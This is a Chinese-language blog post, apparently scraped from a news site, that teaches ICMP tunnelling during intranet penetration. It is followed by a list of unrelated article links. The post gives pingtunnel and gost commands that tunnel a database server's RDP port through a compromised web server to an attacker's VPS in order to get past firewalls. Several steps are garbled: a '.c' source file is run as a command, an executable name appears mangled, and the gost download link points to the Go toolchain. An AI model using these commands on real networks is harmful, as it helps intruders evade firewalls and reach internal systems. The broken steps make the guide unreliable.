当前位置: 首页 > news >正文

内网渗透之icmp隧道传输

原理

# 为什么要建立隧道
在实际的网络中,通常会通过各种边界设备·软/硬件防火墙、入侵检测系统来检查对外连接的情况,如果发现异常,会对通信进行阻断。
​
# 什么是隧道
就是一种绕过端口屏蔽的方式,防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方通信,当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应的服务器上
​
#常见的隧道列举如下:
网络层:ipv6隧道 icmp隧道 gre隧道
传输层:TCP隧道 UDP隧道 常规端口转发
应用层:SSH隧道 HTTP隧道 HTTPS隧道 DNS隧道

验证过程

icmp隧道适用情况

当目标主机未开启任何端口,但是可以接受ping,被控主机能够ping通对方时(并且防火墙不会阻拦icmp协议,不会阻挡ping命令在防火墙上通行)

icmp隧道搭建可用工具

icmpsh、 pingtunnel、icmptunnel、powershell icmp

环境配置(以pingtunnel为例)

# 场景举例
web服务器被控,但是vps与web服务器通信时,中间有防火墙拦截。web服务器无法访问数据库服务器,但是可以ping通,现在打算通过web服务器访问数据库服务器的3389端口,并且转发到vps的1080端口上,拓扑图如下所示。
​
1.在web服务器(windows系统)下载pingtunnel以及winpcap(用于编译pingtunnel)
2,web服务器端开启隧道
3,vps(linux系统)下载pingtunnel的tar.gz文件以及libpacap(函数库)
4,web服务器将数据库服务器的3389端口封装在icmp隧道,并且传送到vps的端口,访问vps的端口时就相当于访问数据库服务器的3389端口

  • pingtunnel下载地址

https://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gz
  • windows安装pingtunnel

下载tar.gz包之后,打开目录会看到如图下的.c文件,这个文件需要利用winpcap编译

  • 下载winpcap

https://www.winpcap.org/install/bin/WinPcap_4_1_3.exe

  • 将ptunnel右击运行方式为rpcapad.exe,在ptunnel文件位置运行cmd命令

ptunnel.c -x she  //-x 指定隧道连接的验证密码

  • vps执行以下命令,在访问vps的1080端口时,会把数据库服务器的3389端口的数据封装在icmp隧道里,以web服务器为跳板进行传送

ptunnel -p vps的ip地址 -lp 1080 -da 数据库服务器ip -dp 3389 -x she //she为隧道密码,要和被控机器的隧道密码一致 -lp:指定要监听的本地tcp端口
-da:指定目标主机的ip地址
-dp:指定被控机器的tcp端口

出现以上截屏说明隧道建立成功,接下来连接这台主机的1080端口,即可访问数据库服务器的3389端口。

gost工具使用

工具安装
linux版
  • 下载地址

https://dl.google.com/go/go1.23.0.linux-amd64.tar.gz
  • 解压文件

tar -xzf go1.23.0.linux-amd64.tar.gz
  • 来到目录gost/gost-master/cmd/gost,执行go build进行编译生成可执行文件

windows版
  • 下载链接

https://codeload.github.com/go-gost/gost/zip/refs/heads/master
  • 编译gost

来到下载的文件目录 \gost\gost-master\cmd\gost
在上面的目录位置运行cmd命令,并且执行go build编译

  • 编译后会生成一个gost.exe文件

隧道搭建
  • 服务器端

./gost -L relay+icmp://:0

  • 客户端

gost.exe -L :8080 -F "relay+icmp://server_ip:12345?keepalive=true&ttl=10s"

http://www.lryc.cn/news/428990.html

相关文章:

  • 【C++ 第十五章】map 和 set 的封装(封装红黑树)
  • LIN通讯
  • zabbix常见架构及组件
  • plsql表格怎么显示中文 plsql如何导入表格数据
  • chromedriver下载地址大全(包括124.*后)以及替换exe后仍显示版本不匹配的问题
  • 拦截器实现 Mybatis Plus 打印含参数的 SQL 语句
  • Oracle Subprogram即Oracle子程序
  • 自然语言处理实战项目30-基于RoBERTa模型的高精度的评论文本分类实战,详细代码复现可直接运行
  • RK3588J正式发布Ubuntu桌面系统,丝滑又便捷!
  • 基于GPT-SoVITS的API实现批量克隆声音
  • 详解华为项目管理,附华为高级项目管理内训材料
  • Perl(Practical Extraction and Reporting Language)脚本
  • 单例模式详细
  • Unity3D 自定义窗口
  • dubbo:dubbo整合nacos实现服务注册中心、配置中心(二)
  • 个人博客指路
  • 【STM32 HAL】多串口printf重定向
  • 帆软报表,达梦数据库驱动上传失败
  • CSS选择器的优先级是如何确定的?有哪些方法可以提高选择器的效率?
  • 【MySQL】基础入门(第二篇)
  • 勇闯机器学习(第二关-数据集使用)
  • 数据库学习(进阶)
  • redis的数据结构——跳表(Skiplist)
  • Docker服务迁移
  • 机器学习:逻辑回归实现下采样和过采样
  • React原理之Fiber双缓冲
  • 机器学习笔记三-检测异常值
  • 如何评估Redis的性能
  • RabbitMQ发布订阅模式Publish/Subscribe详解
  • Android8.1源码下对APK进行系统签名